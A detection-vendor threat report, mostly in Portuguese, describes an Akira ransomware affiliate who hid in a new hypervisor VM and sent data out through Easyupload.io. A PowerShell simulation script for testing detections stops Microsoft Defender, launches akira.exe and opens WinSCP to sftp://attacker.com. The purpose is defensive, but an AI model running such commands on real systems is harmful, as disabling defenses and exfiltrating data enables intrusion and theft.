SOC Prime Bias: Alto

19 Jun 2026 07:31 UTC

Huntress

Akira, LimeWire e o Gosto Amargo da Exfiltração de Dados

SOC Prime Team

Seguir

Akira, LimeWire e o Gosto Amargo da Exfiltração de Dados

Detection stack

AIDR
Alert
ETL
Query

Relatório de Ameaça
Fluxo de Ataque
Detecções
Simulações

Resumo

Um afiliado do ransomware Akira obteve acesso não autorizado a um hipervisor e criou uma nova máquina virtual para usar como ambiente de preparação oculto. O atacante usou esta VM isolada para evitar a monitoração de segurança, preparar dados com o WinRAR, e exfiltrar arquivos através da plataforma de compartilhamento de arquivos Easyupload.io. O caso demonstra como atores de ameaça continuam a abusar de serviços legítimos de upload para roubo de dados.

Investigação

A investigação combinou telemetria EDR, logs de eventos do Windows e histórico de navegação do Microsoft Edge para reconstruir a intrusão. Analistas também recuperaram uma imagem VHDX da máquina virtual maliciosa, que revelou o atacante desativando o Microsoft Defender e configurando a operação do ransomware Akira. A análise forense da VM expôs as exatas ferramentas, websites e fluxo de trabalho usados durante as fases de preparação e exfiltração.

Mitigação

As organizações devem monitorar o aparecimento de novos ou não autorizados terminais e instâncias de máquinas virtuais em todo o seu ambiente. Forte visibilidade em acesso remoto a sistemas críticos, como hipervisores e controladores de domínio, é essencial. Também é importante restringir ou monitorar de perto o acesso a serviços conhecidos de compartilhamento de arquivos e upload rápido que possam ser usados para exfiltração.

Resposta

Se for identificado acesso não autorizado ao hipervisor, isole imediatamente o hipervisor afetado e quaisquer máquinas virtuais recém-criadas. Realize análise forense das imagens de disco da VM para determinar a extensão da preparação e exfiltração de dados. Revise logs de acesso para rastrear o ponto de entrada original e confirmar que não restou acesso persistente do atacante.

graph TB %% Definição de classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% Fase de acesso inicial action_access[“Ação – T1563.002 e T1021 Acesso não autorizado através de Serviços Remotos e Sequestro de Sessões direcionado ao Controlador de Domínio e Hipervisor.”] class action_access action %% Fase de reconhecimento action_recon_ad[“Ação – T1087 e T1681 Reconhecimento através da enumeração de usuários e computadores do Active Directory.”] class action_recon_ad action action_recon_soft[“Ação – T1592.002 Descoberta de informações relacionadas ao software do host.”] class action_recon_soft action %% Evasão de defesa e preparação action_hide_artifact[“Ação – T1564.006 Ocultação de artefatos através da execução de uma nova instância virtual no hipervisor para contornar agentes de segurança.”] class action_hide_artifact action action_disable_defender[“Ação – T1685 Comprometimento das defesas através da desativação do Microsoft Defender na nova máquina virtual.”] class action_disable_defender defense %% Movimento lateral e coleta de dados action_lateral_move[“Ação – T1080 Movimento lateral para o servidor de arquivos da organização.”] class action_lateral_move action tool_winrar[“Ferramenta – Nome: WinRAR Descrição: Utilizada para arquivar arquivos sensíveis dentro de pastas compartilhadas.”] class tool_winrar tool action_collect_data[“Ação – T1560 Coleta de dados através do arquivamento de arquivos sensíveis.”] class action_collect_data action %% Fase de exfiltração action_stage_data[“Ação – T1074.002 Preparação de dados através do armazenamento de arquivos compactados antes da exfiltração.”] class action_stage_data action action_move_tools[“Ação – T1570 Transferência de ferramentas de entrada para mover ferramentas de ataque dentro do ambiente.”] class action_move_tools action tool_winscp[“Ferramenta – Nome: WinSCP Descrição: Utilizada para transferência de dados.”] class tool_winscp tool tool_easyupload[“Ferramenta – Nome: Easyupload.io / LimeWire Descrição: Serviço de transferência de arquivos baseado na web usado para exfiltração.”] class tool_easyupload tool action_exfiltrate[“Ação – T1071.002 e T1105 Exfiltração através de serviços baseados na web e protocolos de transferência de arquivos.”] class action_exfiltrate action %% Fase de impacto malware_akira[“Malware – Nome: Akira ransomware Arquivo: akira.exe Descrição: Criptografa arquivos em compartilhamentos de rede montados.”] class malware_akira malware action_impact[“Ação – T1486 Impacto através da criptografia de dados.”] class action_impact action %% Fluxo de conexões action_access –>|leva_a| action_recon_ad action_access –>|leva_a| action_recon_soft action_recon_ad –>|leva_a| action_hide_artifact action_recon_soft –>|leva_a| action_hide_artifact action_hide_artifact –>|leva_a| action_disable_defender action_disable_defender –>|leva_a| action_lateral_move action_lateral_move –>|leva_a| action_collect_data action_collect_data –>|usa| tool_winrar action_collect_data –>|leva_a| action_stage_data action_stage_data –>|leva_a| action_move_tools action_move_tools –>|leva_a| action_exfiltrate action_exfiltrate –>|usa| tool_winscp action_exfiltrate –>|usa| tool_easyupload action_exfiltrate –>|leva_a| malware_akira malware_akira –>|resulta_em| action_impact

Fluxo de Ataque

Detections

LOLBAS Finger (via cmdline)

SOC Prime Team

18 Jun 2026

View

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via cmdline)

SOC Prime Team

18 Jun 2026

View

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)

SOC Prime Team

18 Jun 2026

View

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)

SOC Prime Team

18 Jun 2026

View

Akira Ransomware Attack via New Virtual Machine and Data Exfiltration [Windows Process Creation]

SOC Prime AI Rules

18 Jun 2026

View

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

Attack Narrative & Commands: The adversary has gained initial access and is looking to escalate the impact. They first enumerate sensitive files by checking for known text files like AdUsers.txt. To prepare for exfiltration, they use WinRAR.exe to compress the data. They then prepare their exfiltration tool, WinSCP.exe, and finally execute the akira.exe ransomware payload. To prevent the EDR/Antivirus from killing the process, they attempt to stop the Windefend service. This specific sequence of command-line arguments and service status changes is intended to trigger the Akira-specific detection logic.

Regression Test Script:

# Simulation Script for Akira Ransomware Detection Validation
# NOTE: This script requires administrative privileges to stop the Defender service.

Write-Host "[+] Starting Akira Ransomware Simulation..." -ForegroundColor Cyan

# 1. Simulate Discovery/Enumeration (T1119)
Write-Host "[+] Step 1: Simulating file enumeration via Notepad..."
Start-Process notepad.exe -ArgumentList "AdUsers.txt"
Start-Sleep -Seconds 2

# 2. Simulate Data Archiving (T1560.003)
# Note: We assume WinRAR is present or we simulate the command line activity
Write-Host "[+] Step 2: Simulating data archival with WinRAR..."
Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
Start-Sleep -Seconds 2

# 3. Simulate Exfiltration Tool Prep (T1105)
Write-Host "[+] Step 3: Simulating exfiltration tool execution..."
Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
Start-Sleep -Seconds 2

# 4. Simulate Ransomware Execution (T1204.002)
Write-Host "[+] Step 4: Simulating Akira payload execution..."
Start-Process "akira.exe"
Start-Sleep -Seconds 2

# 5. Simulate Disabling Defender (T1564.006)
# This triggers EventID 7036 in the System Log
Write-Host "[+] Step 5: Attempting to stop Microsoft Defender..."
Stop-Service -Name "Windefend" -Force

Write-Host "[+] Simulation Complete. Check SIEM for alerts." -ForegroundColor Green

Cleanup Commands:

# Cleanup Script
Write-Host "[+] Cleaning up simulation artifacts..." -ForegroundColor Cyan

# Restart Defender Service
Start-Service -Name "Windefend"

# Remove simulated files
Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue

Write-Host "[+] Cleanup complete." -ForegroundColor Green

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente